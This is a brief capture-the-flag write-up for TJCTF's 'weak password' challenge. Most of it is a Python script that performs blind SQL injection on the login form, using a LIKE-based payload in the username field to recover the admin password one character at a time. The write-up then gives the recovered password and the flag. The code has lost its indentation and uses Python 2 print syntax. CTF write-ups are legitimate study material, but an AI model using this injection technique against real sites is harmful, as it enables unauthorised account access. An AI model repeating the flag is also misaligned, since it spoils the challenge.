Tags: sqli web python 

Rating: 3.0

Here simple python script for weak password which site is vulnerable to sqli
```
import requests
url = "https://weak_password.tjctf.org/login"
passwords = "abcdefghijklmnopqrstuvwxyz1234567890" # as they said password is lowercase letters and numbers
flag = ""
i = 0
while True: # infinate loop
payload = " AND password LIKE '"+flag+passwords[i]+"%';-- -"
data = {"username":"admin'{} -- ".format(payload),"password":"wtf"}
r = requests.post(url,data=data)
if "Congratulations!" in r.text:
flag += passwords[i]
print flag
i = 0
else:
i += 1

```
Password = blindsqli14519

Inflag `tjctf{blindsqli14519}`

Original writeup (https://tjctf.org/).